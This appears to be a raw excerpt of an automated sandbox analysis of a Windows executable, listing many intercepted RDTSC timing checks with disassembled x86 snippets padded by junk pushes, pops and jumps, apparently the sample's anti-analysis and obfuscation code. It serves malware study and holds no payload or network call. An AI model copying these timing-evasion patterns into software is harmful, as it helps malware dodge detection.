Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4BDC8 second address: A4BDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE100E1706Eh 0x0000000c jnp 00007FE100E17066h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4BDE3 second address: A4BDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C0B2 second address: A4C0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C20D second address: A4C239 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE1010EA78Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE1010EA794h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C239 second address: A4C23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C23D second address: A4C26D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA796h 0x00000007 jnp 00007FE1010EA786h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE1010EA790h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C940 second address: A4C96A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E1706Ch 0x00000008 jo 00007FE100E17080h 0x0000000e jmp 00007FE100E17074h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4CC3B second address: A4CC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4CDBE second address: A4CDE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE100E17066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007FE100E17066h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FE100E1706Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4CDE8 second address: A4CDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D265 second address: A4D26F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FE100E17066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D26F second address: A4D2A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE1010EA788h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 js 00007FE1010EA7ADh 0x00000018 push edi 0x00000019 jmp 00007FE1010EA78Fh 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jc 00007FE1010EA786h 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D2A6 second address: A4D2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4BA7E second address: A4BA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A50C13 second address: A50C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE100E1706Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A50C2A second address: A50C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A53869 second address: A5386D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A564CB second address: A564CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A564CF second address: A564D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A564D5 second address: A564E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE1010EA792h 0x00000008 jnp 00007FE1010EA786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A56624 second address: A56628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A56628 second address: A5662E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5662E second address: A56644 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007FE100E17066h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FE100E1707Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A56644 second address: A5664A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C01F0 second address: 9C01F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C30E second address: A5C312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C494 second address: A5C49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C49A second address: A5C4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C8C9 second address: A5C8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A60099 second address: A6009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6009D second address: A600C2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE100E17066h 0x00000008 jmp 00007FE100E17073h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FE100E1706Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5F94A second address: A5F94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5F94F second address: A5F955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5FAD3 second address: A5FAEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6674B second address: A66755 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE100E17066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A66755 second address: A66767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FE1010EA788h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A66767 second address: A6677F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17074h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A650E2 second address: A650E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6577E second address: A6579E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Dh 0x00000007 jmp 00007FE100E1706Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6646F second address: A6647C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFD0 second address: A6BFD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFD5 second address: A6BFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFDD second address: A6BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007FE100E1706Ah 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFF5 second address: A6C001 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C414 second address: A6C435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FE100E1707Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C983 second address: A6C989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C989 second address: A6C99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE100E17066h 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007FE100E17066h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C99E second address: A6C9A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9A3 second address: A6C9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FE100E170A5h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9B6 second address: A6C9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9BA second address: A6C9BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9BE second address: A6C9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE1010EA792h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF6D second address: A6CF71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF71 second address: A6CF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF7F second address: A6CF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF83 second address: A6CF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF87 second address: A6CF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF8F second address: A6CFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE1010EA799h 0x00000008 jns 00007FE1010EA786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CFB3 second address: A6CFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jg 00007FE100E17066h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CFC5 second address: A6CFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA793h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FE1010EA786h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CFE8 second address: A6D009 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE100E17066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FE100E17072h 0x00000012 jmp 00007FE100E1706Ch 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6D009 second address: A6D00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A6D2D2 second address: A6D315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FE100E1706Eh 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FE100E1706Ch 0x00000011 popad 0x00000012 jg 00007FE100E17076h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b je 00007FE100E1706Eh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A6D315 second address: A6D31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A6DC2A second address: A6DC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A6DC2E second address: A6DC4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FE1010EA786h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A71DCE second address: A71DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A72529 second address: A7253C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE1010EA78Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7253C second address: A72540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A72540 second address: A72571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FE1010EA7A4h 0x0000000f jmp 00007FE1010EA798h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D46C second address: A7D472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D472 second address: A7D478 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D478 second address: A7D482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D482 second address: A7D488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D488 second address: A7D49A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D49A second address: A7D4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D7B3 second address: A7D7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 jne 00007FE100E17077h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D95D second address: A7D961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7D961 second address: A7D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE100E1706Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7DAB2 second address: A7DAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7DAB6 second address: A7DAD3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE100E17066h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jbe 00007FE100E17066h 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7DAD3 second address: A7DADA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7DD4E second address: A7DD89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE100E17070h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FE100E1706Eh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d ja 00007FE100E1706Ah 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7E02F second address: A7E047 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1010EA78Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FE1010EA786h 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FE1010EA786h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7E047 second address: A7E077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17070h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jnp 00007FE100E17066h 0x00000016 je 00007FE100E17066h 0x0000001c pop edi 0x0000001d jo 00007FE100E17072h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7E077 second address: A7E07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7E07D second address: A7E081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7E1D7 second address: A7E21A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA796h 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnc 00007FE1010EA79Fh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7E978 second address: A7E97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7F04D second address: A7F080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE1010EA794h 0x00000008 jmp 00007FE1010EA794h 0x0000000d jnp 00007FE1010EA786h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A7CEE8 second address: A7CEF2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE100E1706Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A8954B second address: A8954F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A8954F second address: A89568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17075h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
